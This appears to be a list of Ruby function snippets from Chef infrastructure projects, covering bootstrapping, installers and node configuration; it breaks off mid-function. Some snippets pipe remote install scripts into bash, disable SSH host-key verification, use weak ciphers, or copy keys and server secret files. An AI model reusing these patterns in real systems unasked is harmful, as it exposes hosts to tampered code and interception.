"def configure_chef\n # setup logger for mixlib-shellout gem to consume instead of the chef\n # v0.10.10 behavior of not logging ShellOut calls by default. also setup\n # command failure exception and callback for legacy reasons.\n ::Mixlib::ShellOut.default_logger = ::Chef::Log\n ::Mixlib::ShellOut.command_failure_callback = lambda do |params|\n failure_reason = ::RightScale::SubprocessFormatting.reason(params[:status])\n expected_error_codes = Array(params[:args][:returns]).join(' or ')\n ::RightScale::Exceptions::Exec.new(\"\\\"#{params[:args][:command]}\\\" #{failure_reason}, expected #{expected_error_codes}.\",\n params[:args][:cwd])\n end\n\n # Chef run mode is always solo for cook\n Chef::Config[:solo] = true\n\n # determine default cookbooks path. If debugging cookbooks, place the debug pat(s) first, otherwise\n # clear out the list as it will be filled out with cookbooks needed for this converge as they are downloaded.\n if CookState.use_cookbooks_path?\n Chef::Config[:cookbook_path] = [CookState.cookbooks_path].flatten\n @audit.append_info(\"Using development cookbooks repositories path:\\n\\t- #{Chef::Config[:cookbook_path].join(\"\\n\\t- \")}\")\n else\n # reset the cookbook path. Will be filled out with cookbooks needed for this execution\n Chef::Config[:cookbook_path] = []\n end\n # add the rightscript cookbook if there are rightscripts in this converge\n Chef::Config[:cookbook_path] << @right_scripts_cookbook.repo_dir unless @right_scripts_cookbook.empty?\n\n # must set file cache path and ensure it exists otherwise evented run_command will fail\n file_cache_path = File.join(AgentConfig.cache_dir, 'chef')\n Chef::Config[:file_cache_path] = file_cache_path\n FileUtils.mkdir_p(Chef::Config[:file_cache_path])\n\n Chef::Config[:cache_options][:path] = File.join(file_cache_path, 'checksums')\n FileUtils.mkdir_p(Chef::Config[:cache_options][:path])\n\n # Where backups of chef-managed files should go. Set to nil to backup to the same directory the file being backed up is in.\n Chef::Config[:file_backup_path] = nil\n\n # Chef 11+ defaults client_fork to true which cause Chef::Client to fork\n # This create problems with right_popen - right_popen expects to be used inside running EM reactor\n # EM seems not to play well with forking\n Chef::Config[:client_fork] = false\n\n # Chef 11+ allow concurrent execution of the recipes in different theads,\n # by setting different lockfile per thread.\n Chef::Config[:lockfile] = File.join(Chef::Config[:file_cache_path], \"chef-client-#{@thread_name}-running.pid\")\n\n true\n end",
"def gemspec_helper; end",
"def gemspec_helper; end",
"def gemspec_helper; end",
"def gemspec_helper; end",
"def gemspec_helper; end",
"def gemspec_helper; end",
"def setup_helper\n\n # Define ZOO_LOG_DIR\n node.default['apache_zookeeper'][\"env_vars\"][\"ZOO_LOG_DIR\"] = node['apache_zookeeper']['log_dir']\n\n # Make sure server ids are set or set them\n if !node['apache_zookeeper'][\"zoo.cfg\"].select{ |key, value| key.to_s.match(/\\Aserver.\\d+\\z/)}.empty?\n log \"Using given zoo.cfg config for server ids\"\n\n node['apache_zookeeper'][\"zoo.cfg\"].select{ |key, value| key.to_s.match(/\\Aserver.\\d+\\z/)}.each do |key, value|\n if does_server_match_node? value\n @zookeeper_myid = key[\"server.\".size, key.size]\n break\n end\n end\n\n raise \"Unable to find server [#{node[\"fqdn\"]} in zoo.cfg attributes #{node['apache_zookeeper'][\"zoo.cfg\"].select{ |key, value| key.to_s.match(/\\Aserver.\\d+\\z/)}}\" if @zookeeper_myid.nil?\n\n elsif node['apache_zookeeper'][\"servers\"].empty?\n log \"Configuring standalone zookeeper cluster\"\n else\n log \"Configuring mult-server zookeeper cluster\"\n\n id = 1\n node['apache_zookeeper'][\"servers\"].each do |server|\n if server.include? \":\"\n # If they include port information in their list of servers just use the raw value\n node.default['apache_zookeeper'][\"zoo.cfg\"][\"server.#{id}\"] = server\n else\n node.default['apache_zookeeper'][\"zoo.cfg\"][\"server.#{id}\"] = \"#{server}:#{node['apache_zookeeper'][\"follower_port\"]}:#{node['apache_zookeeper'][\"election_port\"]}\"\n end\n\n if does_server_match_node? server\n @zookeeper_myid = id.to_s\n end\n\n id = id + 1\n end\n\n raise \"Unable to find server [#{node[\"fqdn\"]} in servers attribute #{node['apache_zookeeper'][\"servers\"]}\" if @zookeeper_myid.nil?\n end\n\n end",
"def helpers_require\n ruby_file_path @api, \"#{service_name_full}::Helpers\"\n end",
"def helpers_paths=(_arg0); end",
"def helpers_paths=(_arg0); end",
"def install_tscm\n case node['platform']\n when 'redhat'\n # Create dir to mount\n directory '/opt/IBM/SCM' do\n recursive true\n action :create\n end\n\n #Create SCM logical volume \n node['tscm']['logvols'].each do |logvol|\n lvm_logical_volume logvol['volname'] do\n group node['tscm']['volumegroup']\n size logvol['size']\n filesystem logvol['fstype']\n mount_point logvol['mountpoint']\n end\n end \n # verifying the tscm installation if already exists\n if ::File.exist?(\"#{node['tscm']['installed_dir']}jacclient\")\n install_status = shell_out(\"#{node['tscm']['installed_dir']}jacclient status\").stdout.chop\n if install_status.include?('The Tivoli Security Compliance Manager client is currently running')\n Chef::Log.error('TSCM client already installed on ' + (node['tscm']['node_name']).to_s + '........Nothing to do')\n end\n else\n Chef::Log.info('Installing TSCM ....')\n\n # creating a temporary directory for installinsg TSCM\n tempfolder = '/opt/IBM/tscm_temp'\n\n directory tempfolder.to_s do\n action :create\n end\n\n # get TSCM media to our temp dir\n media = tempfolder + '/' + node['tscm']['base_package'].to_s\n\n remote_file media.to_s do\n source node['tscm']['url'].to_s\n owner 'root'\n group 'root'\n mode '0755'\n action :create_if_missing\n end\n\n # Unpacking TSCM media\n execute 'unpack-media' do\n command 'cd ' + tempfolder.to_s + ' ; ' + ' tar -xf ' + media.to_s\n action :run\n not_if { ::File.exist?(\"#{media}/#{node['tscm']['base_package']}\") }\n end\n\n # run the installation script\n bash 'install-tscm' do\n code <<-EOH\n cd #{tempfolder}\n chmod 744 install_x64.sh\n ./install_x64.sh\n EOH\n end\n\n # copy the ssh key for TSCM to /opt/IBM/\n cookbook_file node['tscm']['key'].to_s do\n source node['tscm']['key_name'].to_s\n owner 'root'\n group 'root'\n mode '400'\n action :create_if_missing\n end\n\n # create temp directory to copy the auditing patching file\n directory node['tscm']['patch_dir'].to_s do\n recursive true\n owner 'root'\n group 'root'\n mode '0744'\n action :create\n end\n\n # copy the powershell script to node system\n cookbook_file node['tscm']['copy_script_path'].to_s do\n source 'copy_script.ps1'\n owner 'root'\n group 'root'\n mode '750'\n action :create\n end\n\n # copy the powershell script to TSCM Server\n bash 'copy-powershell-script-to-tscm-server' do\n code <<-EOH\n scp -C -o StrictHostKeyChecking=no -i #{node['tscm']['key']} #{node['tscm']['copy_script_path']} #{node['tscm']['proxy_user']}@#{node['tscm']['proxy_server']}:/c:/users/scm_auto_usr/\n\t EOH\n live_stream true\n action :run\n end\n\n # run the powershell scripts\n execute 'run-powershell-script' do\n command \"ssh -n -i #{node['tscm']['key']} #{node['tscm']['proxy_user']}@#{node['tscm']['proxy_server']} powershell -File 'C:/Users/scm_auto_usr/copy_script.ps1'\"\n live_stream true\n action :run\n end\n\n # copy the audit patching file\n execute 'download-audi-patching-file' do\n command \"scp -o StrictHostKeyChecking=no -i #{node['tscm']['key']} #{node['tscm']['proxy_user']}@#{node['tscm']['proxy_server']}:/C:/Users/scm_auto_usr/lssec_secfixdb_all.tar.gz /opt/IBM/SCM/client/software/completed/\"\n live_stream true\n action :run\n not_if { ::File.exist?(node['tscm']['audit_file'].to_s) }\n end\n\n client_pref = shell_out(\"grep 'debug=true' #{node['tscm']['client_pref']} \").stdout.chop\n\n if client_pref.include?('debug=true')\n Chef::Log.info('File Up to date..........Nothing to do')\n else\n # update the client.pref file to debug mode\n execute 'update-client.pref' do\n command \"sed -i -e 's/debug=false/debug=true/' #{node['tscm']['client_pref']}\"\n action :run\n end\n\n # restarting TSCM agent service for changes to take effect\n service node['tscm']['service_name'].to_s do\n action :stop\n end\n\n service node['tscm']['service_name'].to_s do\n action :start\n end\n end\n end\n\n # installing on aix\n when 'aix'\n Chef::Log.info('Installing TSCM on AIX platform...........')\n\n if ::File.exist?(\"#{node['tscm']['installed_dir']}jacclient\")\n install_status = shell_out(\"#{node['tscm']['installed_dir']}jacclient status\").stdout.chop\n if install_status.include?('HCVIN0033I The Tivoli Security Compliance Manager client is currently running')\n Chef::Log.error('TSCM client already installed on ' + (node['tscm']['node_name']).to_s + '........Nothing to do')\n end\n else\n Chef::Log.info('TSCM not installed ........Installing TSCM ')\n\n # creating temporary directory for copying tscm binaries\n tempfolder = '/opt/IBM/tscm_software'\n\n directory tempfolder.to_s do\n action :create\n not_if { ::File.exist?(tempfolder.to_s) }\n end\n\n media = tempfolder.to_s + '/' + (node['tscm']['base_package']).to_s\n node.default['tscm']['package_name'] = (node['tscm']['base_package']).to_s.chomp('.tar')\n\n # downloading binaries from the url\n remote_file media.to_s do\n source node['tscm']['url'].to_s\n owner 'root'\n mode '0755'\n action :create_if_missing\n end\n\n # creating prerequisite FS\n # create volume group ibmvg as mandatory requirement\n execute 'create-VG-ibmvg' do\n command 'mkvg -f -y ibmvg hdisk1'\n action :run\n returns [0, 1]\n not_if { shell_out('lsvg | grep ibmvg').stdout.chop != '' }\n end\n\n # required FS\n volumes = [\n { lvname: 'lv_scm', fstype: 'jfs2', vgname: 'ibmvg', size: 500, fsname: '/opt/IBM/SCM' },\n ]\n # Custom FS creation\n volumes.each do |data|\n ibm_tscm_makefs \"creation of #{data[:fsname]} file system\" do\n lvname data[:lvname]\n fsname data[:fsname]\n vgname data[:vgname]\n fstype data[:fstype]\n size data[:size]\n end\n end\n\n # Unpacking TSCM media\n execute 'unpack-media' do\n command 'cd ' + tempfolder.to_s + ' ; ' + ' tar -xf ' + media.to_s\n action :run\n not_if { ::File.exist?(media.to_s + node['tscm']['package_name'].to_s + 'install_aix6.sh') }\n end\n\n # run the installation script\n bash 'install-tscm' do\n code <<-EOH\n cd #{tempfolder}\n chmod +x install_aix6.sh\n ./install_aix6.sh \n EOH\n end\n\n # copy the ssh key for TSCM to /opt/IBM/ directory\n cookbook_file node['tscm']['key'].to_s do\n source node['tscm']['key_name'].to_s\n owner 'root'\n mode '400'\n action :create_if_missing\n end\n\n # create temp directory to copy the auditing patching file\n directory node['tscm']['patch_dir'].to_s do\n recursive true\n owner 'root'\n mode '0744'\n action :create\n end\n\n # copy the audit patching file\n execute 'download-audi-patching-file' do\n command \"scp -o StrictHostKeyChecking=no -i #{node['tscm']['key']} #{node['tscm']['proxy_user']}@#{node['tscm']['proxy_server']}:/C:/PROGRA~1/IBM/SCM/client/software/completed/lssec_secfixdb_all.tar.gz /opt/IBM/SCM/client/software/completed/\"\n action :run\n not_if { ::File.exist?(node['tscm']['audit_file'].to_s) }\n end\n\n # changing log-level to debug mode\n client_pref = shell_out(\"grep 'debug=true' #{node['tscm']['client_pref']} \").stdout.chop\n\n if client_pref.include?('debug=true')\n Chef::Log.info('File Up to date..........Nothing to do')\n else\n # update the client.pref file to debug mode\n execute 'update-client.pref' do\n command \"sed -e 's/debug=false/debug=true/g' #{node['tscm']['client_pref']}\"\n action :run\n end\n\n # restarting TSCM agent service for changes to take effect\n execute 'restart-tscm-service' do\n command '/opt/IBM/SCM/client/jacclient restart'\n action :run\n end\n end\n end\n end\nend",
"def cookbook_url_base\n \"cookbooks\"\n end",
"def bootstrap_chef_script role, settings\n erubis_template(\n File.dirname(__FILE__)+\"/../config/user_data_script-#{role}.sh.erb\",\n :public_ip => settings[:elastic_ip],\n :hostname => settings[:user_data][:attributes][:node_name],\n :chef_server_fqdn => settings[:user_data][:chef_server].gsub(%r{http://(.*):\\d+},'\\1'),\n :ubuntu_version => 'lucid',\n :bootstrap_scripts_url_base => settings[:bootstrap_scripts_url_base],\n :chef_config => settings[:user_data]\n )\nend",
"def install_lazyk(prefix)\n cookbook_file \"#{Chef::Config[:file_cache_path]}/lazy.cpp\" do\n user 'root'\n group 'root'\n mode '0644'\n not_if \"test -e #{prefix}/bin/lazyk\"\n end\n\n bash \"install-lazyk\" do\n user 'root'\n cwd Chef::Config[:file_cache_path]\n code <<-EOH\n set -ex\n mkdir -p #{prefix}/bin\n g++ lazy.cpp -o #{prefix}/bin/lazyk\n EOH\n not_if \"test -e #{prefix}/bin/lazyk\"\n end\nend",
"def printstuff(stuff)\n Chef::Log.info\" Stuff is: #{stuff}\"\nend",
"def prefix\n (platform_family?('windows') ? 'C:/Chef/' : '/etc/chef/')\nend",
"def chef_client\n command = \"chef-client\"\n if sudo\n command = \"sudo #{command}\"\n end\n\n run(command)\n end",
"def helpers_paths; end",
"def helpers_paths; end",
"def helpers_paths; end",
"def helpers_paths; end",
"def chef\n @chef ||= Appd::Server::Chef.new ssh\n end",
"def manual_bootstrap_for_node\n validate!([:bootstrap_pass])\n\n #Where the validation pem and chef-client exist on\n #the chef workstation this is run from\n validation_pem_path = Chef::Config[:validation_key]\n puts \"Using client key #{validation_pem_path}\"\n chef_client_path = Chef::Config[:knife][:chef_client_aix_path]\n puts \"Using chef-client located in #{chef_client_path}\"\n\n if validation_pem_path.nil? or chef_client_path.nil?\n puts \"No client validation pem or chef-client installable specified in knife.rb. Skipping Chef Bootstrap...\"\n return nil\n end\n\n #Where to place these files on the target server\n remote_chef_client_path = \"/tmp/2014-02-06-chef.11.10.0.0.bff\"\n remote_validation_pem_path = \"/etc/chef/validation.pem\"\n\n #For some reason, Net::SSH and Net::SCP only work on\n #AIX using :kex => \"diffie-hellman-group1-sha1\" and\n # :encryption => [\"blowfish-cbc\", \"3des-cbc\"]\n # :paranoid => false (avoids host key verification)\n Net::SSH.start(get_config(:ip_address), \n get_config(:bootstrap_user) || \"root\", \n :password => get_config(:bootstrap_pass), \n :kex => \"diffie-hellman-group1-sha1\",\n :encryption => [\"blowfish-cbc\", \"3des-cbc\"],\n :paranoid => false) do |ssh| \n\n #Copy the chef-client .bff file to the client machine in /tmp\n puts \"Copying chef client binary to client\"\n ssh.scp.upload!(chef_client_path, remote_chef_client_path)\n\n #Run the install command\n puts \"Running chef client install\"\n output = ssh.exec!(\"installp -aYFq -d #{remote_chef_client_path} chef\")\n Chef::Log.debug(\"Chef Client install output:\\n#{output}\")\n\n #Run the configure client command\n puts \"Running knife configure client command\"\n output = ssh.exec!(\"knife configure client -s #{get_config(:register_node)} /etc/chef\")\n Chef::Log.debug(\"Knife Configure output:\\n#{output}\")\n\n #Copy the validation key to /etc/chef on the client\n puts \"Uploading validation.pem to client\"\n ssh.scp.upload!(validation_pem_path, remote_validation_pem_path)\n\n #Edit /etc/chef/client.rb so that it points at the location of the validator\n puts \"Adding validator key path to client.rb\"\n cmd = %Q{echo \"validator_key '#{remote_validation_pem_path}'\" >> /etc/chef/client.rb}\n output = ssh.exec!(cmd)\n Chef::Log.debug(\"#{output}\")\n\n #Register the client node with the Chef server, by running chef-client\n #Add additional handling of this command to determine if the chef-client\n #run finished successfully or not.\n puts \"Running chef-client to register as a Chef node\"\n output = \"\"\n stderr_out = \"\"\n exit_code = nil\n ssh.exec(\"chef-client\") do |ch, success|\n unless success\n abort \"FAILED: chef-client command failed to execute on client\"\n end\n ch.on_data do |ch,data|\n output+=data\n end\n ch.on_extended_data do |ch,type,data|\n stderr_out+=data\n end\n ch.on_request(\"exit-status\") do |ch,data|\n exit_code = data.read_long\n end\n end\n ssh.loop\n if exit_code != 0\n puts \"Initial chef-client run failed. Please verify client settings and rerun chef-client to register this server as a node with #{get_config(:register_node)}\"\n return nil\n end\n Chef::Log.debug(\"chef-client command output:\\n#{output}\")\n end\n end",
"def gemspec_helper=(_arg0); end",
"def gemspec_helper=(_arg0); end",
"def gemspec_helper=(_arg0); end",
"def gemspec_helper=(_arg0); end",
"def gemspec_helper=(_arg0); end",
"def gemspec_helper=(_arg0); end",
"def gemspec_helper=(_arg0); end",
"def chef_context\n @chef_context || ::Capistrano.env\n end",
"def delivery_chef_server\n DeliveryTruck::Helpers.delivery_chef_server(node)\n end",
"def current_version\n node['chef_packages']['chef']['version']\nend",
"def current_version\n node['chef_packages']['chef']['version']\nend",
"def lybunt_setup\n end",
"def chef_solo\n fetch(:chef_solo).to_s || 'chef-solo'\n end",
"def chef_client(host, options = {})\n raise RuntimeError, \"abstract function: must be implemented on includer\"\n end",
"def bootstrap_for_node\n bootstrap = Chef::Knife::Bootstrap.new\n bootstrap.name_args = [config[:fqdn]]\n bootstrap.config[:run_list] = get_config(:run_list).split(/[\\s,]+/)\n bootstrap.config[:secret_file] = get_config(:secret_file)\n bootstrap.config[:hint] = get_config(:hint)\n bootstrap.config[:ssh_user] = get_config(:ssh_user)\n bootstrap.config[:ssh_password] = get_config(:ssh_password)\n bootstrap.config[:ssh_port] = get_config(:ssh_port)\n bootstrap.config[:identity_file] = get_config(:identity_file)\n bootstrap.config[:chef_node_name] = get_config(:chef_node_name)\n bootstrap.config[:prerelease] = get_config(:prerelease)\n bootstrap.config[:bootstrap_version] = get_config(:bootstrap_version)\n bootstrap.config[:distro] = get_config(:distro)\n bootstrap.config[:use_sudo] = true unless get_config(:ssh_user) == 'root'\n bootstrap.config[:template_file] = get_config(:template_file)\n bootstrap.config[:environment] = get_config(:environment)\n bootstrap.config[:first_boot_attributes] = get_config(:first_boot_attributes)\n bootstrap.config[:log_level] = get_config(:log_level)\n # may be needed for vpc_mode\n bootstrap.config[:no_host_key_verify] = get_config(:no_host_key_verify)\n bootstrap\n end",
"def cookbook_clean_start\n end",
"def server_software; end",
"def base_recipe()\n warn \"#{self} hasn't been overridden to return a Proc!!\"\n lambda {\n # put your capistrano config and tasks in here\n }\n end",
"def run\n ngen_auth\n @validate = Validator.new\n stack = EcoSystem.new\n @instanceparameters = stack.yaml_reader(config[:yaml])\n stack.validate = @validate\n config[:action] = 'create'\n stack.options = config\n stack.supress_output ='1'\n stack.instanceparameters = @instanceparameters\n inst_result = stack.opt_parse\n ho_hum\n \n inst_result.each do |server|\n config[:inst] = server['server']['display_name']\n instance = {}\n # puts chef_attrs = server['server']['userdata'].at(0)['chef']\n chef_attrs = server['server']['userdata'].at(0)['chef'] if !server['server']['userdata'].at(0)['chef'].nil?\n chef_attrs.each do |attr, value|\n instance[attr] = value\n end\n chef_node_configuration(instance)\n config[:chef_node_name] = config[:inst]\n inst_details = AttrFinder.new(server)\n inst_details.options = config\n inst_details.validate = @validate\n inst_details.function = 'server' \n inst = InstanceClient.new\n inst.validate = @validate\n inst.options = config\n inst.supress_output ='1'\n inst.instanceparameters = @instanceparameters\n ssh_host = inst.list_instance_ip(inst_details.compartment, inst_details.instance).at(1)\n bootstrap_for_linux_node(ssh_host).run\n node_attributes(ssh_host, 'IaaS')\n end\n end",
"def install_spec_helper\n stubbed_facts = String.new\n if @config[@origin].has_key?('stubbed_facts')\n @config[@origin]['stubbed_facts'].keys.each do |k|\n stubbed_facts += \" :#{k} => '#{@config[@origin]['stubbed_facts'][k]}',\\n\"\n end\n end\n\n code_coverage = String.new\n if @config[@origin].has_key?('code_coverage')\n percent = @config[@origin]['code_coverage']\n code_coverage = \" c.after(:suite) do\n RSpec::Puppet::Coverage.report!(#{percent})\n end\"\n end\n\n subs = {\n '##STUBBED_FACTS##' => stubbed_facts,\n '##CODE_COVERAGE##' => code_coverage,\n }\n\n install_template([\"#{@templates}/spec_helper.rb\"], 'spec/spec_helper.rb', subs)\n end",
"def content\n return <<-EOF\ndefault lucie\n\nlabel lucie\nkernel #{ INSTALLER_KERNEL }\nappend initrd=#{ initrd } ip=dhcp devfs=nomount root=/dev/nfs nfsroot=#{ @nfsroot } boot=live hostname=#{ @node.name } #{ $KERNEL_OPTIONS }\nEOF\n end",
"def knife(sub_cmd)\n chef_exec(knife_cmd(sub_cmd))\nend",
"def helpers &blk\n @helpers = blk\n end",
"def run\n Shef::Extensions.extend_context_object(self)\n ssh_config = []\n\n ssh_config << \"\\n\\n### BEGIN KNIFE BLOCK ###\"\n ssh_config << \"## This was generated by `knife setup ssh`:\"\n\n STDOUT.sync = true\n\n nodes.all do |n|\n next if /vagrant/.match(n.name)\n name = n.name\n name << '.lisausa.net' unless /\\.lisausa.net\\Z/.match(n.name)\n\n begin\n hostname = n.ipaddress\n rescue => ex\n ui.warn(\"Error (#{ex.inspect}) while getting #ipaddress for #{n.name}\")\n next\n end\n\n ssh_config << [\n \"Host #{name}\",\n \" HostName #{hostname}\",\n \" HostKeyAlias #{[name,hostname,n.macaddress].join('-')}\"\n ]\n end\n\n if (c = Chef::Config.knife).keys.grep(/identity_file|ssh_user/).any?\n ssh_config.push [\n \"Host *.lisausa.net\",\n \" IdentitiesOnly yes\",\n \" PasswordAuthentication no\",\n \" ForwardAgent yes\"\n ]\n ssh_config.push \" IdentityFile #{c[:identity_file]}\" if c[:identity_file]\n ssh_config.push \" User #{c[:ssh_user]}\" if c[:ssh_user]\n end\n\n ssh_config << \"### END KNIFE BLOCK ###\"\n ssh_config = ssh_config.flatten.join(\"\\n\")\n\n file_path = File.join(ENV['HOME'], '.ssh', 'config')\n if config[:write] or ui.ask_question(\"Write config to #{file_path} (Y/N)?\", default: 'N').downcase == 'y'\n FileUtils.copy_file(file_path, \"#{file_path}~\")\n File.open(file_path, File::RDWR|File::CREAT) do |f|\n f.flock(File::LOCK_EX)\n\n contents = f.read.gsub(/\\n*### BEGIN KNIFE BLOCK ###.+?(### END KNIFE BLOCK ###|\\Z)/m, ssh_config)\n unless contents.include?('### BEGIN KNIFE BLOCK ###')\n contents << ssh_config\n end\n f.rewind\n f.truncate(0)\n f.write contents\n end\n ui.msg \"Wrote to #{file_path}. Previous contents were backed up to #{file_path}~\"\n else\n ui.msg \"Copy and paste the following into your #{file_path} file:\"\n ui.msg ssh_config\n end\n end",
"def chef_config\n ci = @json.split('/').last.gsub('.json', '')\n \"#{prefix_root}/home/oneops/#{@circuit}/components/cookbooks/\" \\\n \"chef-#{ci}.rb\"\n end",
"def client\n return @client if @client\n\n @client = Chef::Client.new\n @client.ohai.data = Mash.from_hash(Fauxhai.mock(options).data)\n @client.load_node\n @client.build_node\n @client.save_updated_node\n @client\n end",
"def version_helper; end",
"def version_helper; end",
"def version_helper; end",
"def version_helper; end",
"def download_bootstrap_files(machine_name = 'bootstrap-backend')\n # download server files\n %w{ actions-source.json webui_priv.pem }.each do |analytics_file|\n machine_file \"/etc/opscode-analytics/#{analytics_file}\" do\n local_path \"#{node['qa-chef-server-cluster']['chef-server']['file-dir']}/#{analytics_file}\"\n machine machine_name\n action :download\n end\n end\n\n# download more server files\n %w{ pivotal.pem webui_pub.pem private-chef-secrets.json }.each do |opscode_file|\n machine_file \"/etc/opscode/#{opscode_file}\" do\n local_path \"#{node['qa-chef-server-cluster']['chef-server']['file-dir']}/#{opscode_file}\"\n machine machine_name\n action :download\n end\n end\nend",
"def chef_error(e)\n if e.is_a?(::RightScale::Exceptions::Exec)\n msg = \"External command error: \"\n if match = /RightScale::Exceptions::Exec: (.*)/.match(e.message)\n cmd_output = match[1]\n else\n cmd_output = e.message\n end\n msg += cmd_output\n msg += \"\\nThe command was run from \\\"#{e.path}\\\"\" if e.path\n elsif e.is_a?(::Chef::Exceptions::ValidationFailed) && (e.message =~ /Option action must be equal to one of:/)\n msg = \"[chef] recipe references an action that does not exist. #{e.message}\"\n elsif e.is_a?(::NoMethodError) && (missing_action_match = /undefined method .action_(\\S*)' for #<\\S*:\\S*>/.match(e.message)) && missing_action_match[1]\n msg = \"[chef] recipe references the action <#{missing_action_match[1]}> which is missing an implementation\"\n else\n msg = \"Execution error:\\n\"\n msg += e.message\n file, line, meth = e.backtrace[0].scan(BACKTRACE_LINE_REGEXP).flatten\n line_number = line.to_i\n if file && line && (line_number.to_s == line)\n dir = AgentConfig.cookbook_download_dir\n if file[0..dir.size - 1] == dir\n path = \"[COOKBOOKS]/\" + file[dir.size..file.size]\n else\n path = file\n end\n msg += \"\\n\\nThe error occurred line #{line} of #{path}\"\n msg += \" in method '#{meth}'\" if meth\n context = \"\"\n if File.readable?(file)\n File.open(file, 'r') do |f|\n lines = f.readlines\n lines_count = lines.size\n if lines_count >= line_number\n upper = [lines_count, line_number + 2].max\n padding = upper.to_s.size\n context += context_line(lines, line_number - 2, padding)\n context += context_line(lines, line_number - 1, padding)\n context += context_line(lines, line_number, padding, '*')\n context += context_line(lines, line_number + 1, padding)\n context += context_line(lines, line_number + 2, padding)\n end\n end\n end\n msg += \" while executing:\\n\\n#{context}\" unless context.empty?\n end\n end\n msg\n end",
"def install_dependencies\n recipe_eval do\n run_context.include_recipe 'chef-sugar::default'\n run_context.include_recipe 'build-essential::default'\n\n case node.platform_family\n when 'debian'\n package 'curl'\n package 'git-core'\n package 'libxml2-dev'\n package 'libxslt-dev'\n package 'zlib1g-dev'\n package 'ncurses-dev'\n package 'libssl-dev'\n when 'freebsd'\n package 'textproc/libxml2'\n package 'textproc/libxslt'\n package 'devel/ncurses'\n when 'mac_os_x'\n run_context.include_recipe 'homebrew::default'\n package 'libxml2'\n package 'libxslt'\n package 'openssl'\n when 'rhel'\n package 'curl'\n package 'bzip2'\n package 'file'\n package 'git'\n package 'libxml2-devel'\n package 'libxslt-devel'\n package 'ncurses-devel'\n package 'zlib-devel'\n package 'openssl-devel'\n end\n end\n end",
"def helpers_path=(_arg0); end",
"def install_chef\n ssh.exec! \"curl -L https://www.opscode.com/chef/install.sh | bash\", sudo: true\n chef.init\n return Appd::Server::Chef::APPD_COOKBOOK_PATH\n end",
"def get_install_client\n purge\n s('cd /tmp')\n s('wget https://apt.puppetlabs.com/puppetlabs-release-trusty.deb')\n s('sudo apt-get update')\n s('sudo apt-get -y install puppet')\nend",
"def setup\n required_version = YAML.load_file(\"#{@repository_path}/chef_versions.yml\")['workstation']\n Bundler.with_unbundled_env do\n exit_status, stdout, _stderr = @cmd_runner.run_cmd '/opt/chef-workstation/bin/chef --version', expected_code: [0, :command_error]\n existing_version =\n if exit_status == :command_error\n 'not installed'\n else\n expected_match = stdout.match(/^Chef Workstation version: (.+)\\.\\d+$/)\n expected_match.nil? ? 'unreadable' : expected_match[1]\n end\n log_debug \"Current Chef version: #{existing_version}. Required version: #{required_version}\"\n @cmd_runner.run_cmd \"curl -L https://omnitruck.chef.io/install.sh | #{@cmd_runner.root? ? '' : 'sudo '}bash -s -- -P chef-workstation -v #{required_version}\" unless existing_version == required_version\n end\n end",
"def init\n create_file options[:inventory_config] do\n<<-YML\n# sources:\n# - \"https://supermarket.getchef.com\"\n# cookbooks:\n# cookbook-name:\n# versions:\n# - \"~> 4.0.2\"\n# - \"> 5.0.0\"\n# git:\n# location: url | path\n# branches:\n# - a_branch_name\n# refs:\n# - SHA\n\nYML\n end\n end",
"def saveChefMetadata\n self.class.loadChefLib\n @server.getSSHConfig # why though\n MU.log \"Saving #{@server.mu_name} Chef artifacts\"\n\n begin\n chef_node = ::Chef::Node.load(@server.mu_name)\n rescue Net::HTTPServerException\n @server.deploy.sendAdminSlack(\"Couldn't load Chef metadata on `#{@server.mu_name}` :crying_cat_face:\")\n raise MU::Groomer::RunError, \"Couldn't load Chef node #{@server.mu_name}\"\n end\n\n # Figure out what this node thinks its name is\n system_name = chef_node['fqdn'] if !chef_node['fqdn'].nil?\n MU.log \"#{@server.mu_name} local name is #{system_name}\", MU::DEBUG\n\n chef_node.normal.app = @config['application_cookbook'] if !@config['application_cookbook'].nil?\n chef_node.normal[\"service_name\"] = @config[\"name\"]\n chef_node.normal[\"credentials\"] = @config[\"credentials\"]\n chef_node.normal[\"windows_admin_username\"] = @config['windows_admin_username']\n chef_node.chef_environment = MU.environment.downcase\n if @server.config['cloud'] == \"AWS\"\n chef_node.normal[\"ec2\"] = MU.structToHash(@server.cloud_desc)\n end\n\n if @server.windows?\n chef_node.normal['windows_admin_username'] = @config['windows_admin_username']\n chef_node.normal['windows_auth_vault'] = @server.mu_name\n chef_node.normal['windows_auth_item'] = \"windows_credentials\"\n chef_node.normal['windows_auth_password_field'] = \"password\"\n chef_node.normal['windows_auth_username_field'] = \"username\"\n chef_node.normal['windows_ec2config_password_field'] = \"ec2config_password\"\n chef_node.normal['windows_ec2config_username_field'] = \"ec2config_username\"\n chef_node.normal['windows_sshd_password_field'] = \"sshd_password\"\n chef_node.normal['windows_sshd_username_field'] = \"sshd_username\"\n end\n\n # If AD integration has been requested for this node, give Chef what it'll need.\n if !@config['active_directory'].nil?\n chef_node.normal['ad']['computer_name'] = @server.mu_windows_name\n chef_node.normal['ad']['node_class'] = @config['name']\n chef_node.normal['ad']['domain_name'] = @config['active_directory']['domain_name']\n chef_node.normal['ad']['node_type'] = @config['active_directory']['node_type']\n chef_node.normal['ad']['domain_operation'] = @config['active_directory']['domain_operation']\n chef_node.normal['ad']['domain_controller_hostname'] = @config['active_directory']['domain_controller_hostname'] if @config['active_directory'].has_key?('domain_controller_hostname')\n chef_node.normal['ad']['netbios_name'] = @config['active_directory']['short_domain_name']\n chef_node.normal['ad']['computer_ou'] = @config['active_directory']['computer_ou'] if @config['active_directory'].has_key?('computer_ou')\n chef_node.normal['ad']['domain_sid'] = @config['active_directory']['domain_sid'] if @config['active_directory'].has_key?('domain_sid')\n chef_node.normal['ad']['dcs'] = @config['active_directory']['domain_controllers']\n chef_node.normal['ad']['domain_join_vault'] = @config['active_directory']['domain_join_vault']['vault']\n chef_node.normal['ad']['domain_join_item'] = @config['active_directory']['domain_join_vault']['item']\n chef_node.normal['ad']['domain_join_username_field'] = @config['active_directory']['domain_join_vault']['username_field']\n chef_node.normal['ad']['domain_join_password_field'] = @config['active_directory']['domain_join_vault']['password_field']\n chef_node.normal['ad']['domain_admin_vault'] = @config['active_directory']['domain_admin_vault']['vault']\n chef_node.normal['ad']['domain_admin_item'] = @config['active_directory']['domain_admin_vault']['item']\n chef_node.normal['ad']['domain_admin_username_field'] = @config['active_directory']['domain_admin_vault']['username_field']\n chef_node.normal['ad']['domain_admin_password_field'] = @config['active_directory']['domain_admin_vault']['password_field']\n end\n\n # Amazon-isms, possibly irrelevant\n awscli_region_widget = {\n \"compile_time\" => true,\n \"config_profiles\" => {\n \"default\" => {\n 